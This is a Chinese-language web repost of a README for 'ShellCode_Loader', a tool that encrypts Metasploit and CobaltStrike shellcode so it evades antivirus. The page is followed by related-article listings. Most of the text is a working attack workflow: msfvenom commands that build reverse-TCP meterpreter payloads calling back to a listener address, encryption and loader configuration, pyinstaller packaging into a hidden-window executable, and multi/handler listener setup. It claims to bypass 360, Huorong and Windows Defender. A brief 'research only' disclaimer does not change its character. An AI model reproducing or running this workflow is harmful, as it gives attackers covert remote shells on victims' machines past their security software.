ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具

这篇具有很好参考价值的文章主要介绍了ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具


ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器、Shellcode_encryption - 免杀Shellcode加密生成工具,目前测试免杀360&火绒&电脑管家&Windows Defender(其他杀软未测试)。

一、声明

该项目仅供网络安全研究使用,禁止使用该项目进行违法操作,否则自行承担后果,请各位遵守《中华人民共和国网络安全法》!!!

代码未经过大量测试,如发现问题请提交 issue。

二、测试环境

截至2022年9月3日测试时Windows 10 可免国内杀软:火绒&360&电脑管家及Windows Defender(其他杀软自测)

Windows 7 64位 或以上操作系统应该都没问题(没有测试)

三、生成Msf_Payload

默认

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f c -o payload.c

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f py -o payload.c

XOR 编码器

msfvenom -e x64/xor -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f c -o payload.c

动态密钥XOR编码器

msfvenom -e x64/xor_dynamic -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f c -o payload.c

Zutto Dekiru

msfvenom -e x64/zutto_dekiru -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f c -o payload.c

四、生成CobaltStrike_Payload

ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具
选择使用x64的C语言或Python语言的Shellcode。
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具
得到:payload.c
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具

五、加密Payload

Shellcode_encryption.exe payload.c
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具

六、配置ShellCode加载器

将生成的密文ShellCode 填至 ShellCode_Loader.py 里的 Data = '密文Shellcode’处

示例:
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具

七、打包可执行程序(EXE编译环境)

Python 3.8.6

pyinstaller 4.7

pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
pyinstaller -F -w ShellCode_Loader.py

生成ShellCode_Loader.exe在dist目录中。

八、上线测试

运行监听

msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8080
msf6 exploit(multi/handler) > run

ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具
项目地址:
https://github.com/Axx8/ShellCode_Loader文章来源地址https://www.toymoban.com/news/detail-441333.html

到了这里,关于ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 7.8(wmi命令+ServiceName+CobaltStrike Loader)

    优先级(Priority)是操作系统对进程或线程分配处理器资源的重要性排序。较高的优先级意味着进程或线程更有可能在竞争处理器资源时被调度执行。 进程ID(Process ID)是唯一标识系统中每个正在运行的进程的数字。每个进程都有一个独立的进程ID。进程ID可以用于识别和管理

    2024年02月13日
    浏览(32)
  • Shellcode免杀技术的探索与应对策略

    最近在学免杀的  顺道了解一些知识   文章目录 前言 一、Shellcode免杀技术的原理 二、常见的Shellcode免杀策略 三、应对策略 总结 随着网络安全威胁的不断增加,攻击者也在不断寻找新的方法绕过安全防护措施,其中之一就是通过免杀技术来隐藏和执行恶意代码。而shellco

    2024年02月13日
    浏览(48)
  • 免杀对抗-ShellCode上线+回调编译执行+混淆变异算法

    C/C++ -- ShellCode - 免杀对抗 介绍:          shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。我们经常在CS里面生成指定编程语言的payload,而这个payload里面就是一段十六进制的机器码。 为什么要使用 shellcode :

    2024年02月09日
    浏览(37)
  • msf编码免杀

    目录 (一)认识免杀 1、杀软是如何检测出恶意代码的? 2、免杀是做什么? 3、免杀的基本方法有哪些? (二) 不处理payload直接生成样本进行检测 1、生成后门 2、开启http服务 3、打开Web页 4、在网站上传分析 (三) MSF自编码处理payload生成样本进行检测 1、查看可以用编码模

    2024年02月05日
    浏览(45)
  • 4.1 MSF 制作shellcode,且运行

    目录 一、实验清单 二、实验思路 三、实验步骤 1、在控制台中,使用“msfvenom -h”命令可以查看msfvenom的相关命令 2、制作shellcode  3、监听与处理 实验所需清单 类型 序号 软硬件要求 规格 攻击机 1 数量 1台 2 操作系统版本 kali 3 软件版本 metasploit 靶机 1 数量 1台 2 操作系统版

    2024年02月06日
    浏览(248)
  • 基于Go加载shellcode

    这里通过TideSec的go免杀项目来从0开始学习 首先导个包,需要用到如下几个包。 io/ioutil 文件操作 os 系统操作 syscall syscall包含一个指向底层操作系统原语的接口 unsafe Go指针的操作非常有限,仅支持赋值和取值,不支持指针运算,可以通过unsafe包来达到效果 这里定义一下变量

    2024年02月09日
    浏览(271)
  • 第116天:免杀对抗-EDR&Syscall-hook&DLL反射注入&白加黑&隐写分离&加载器

    知识点 演示案例: 总结

    2024年02月16日
    浏览(44)
  • CobaltStrike搭建--多人协作

    在团队(服务端)启动服务遇到两个报错 https://www.oracle.com/java/technologies/downloads/#java18 rpm -ivh jdk–xx(直接Tab即可)

    2024年02月13日
    浏览(66)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包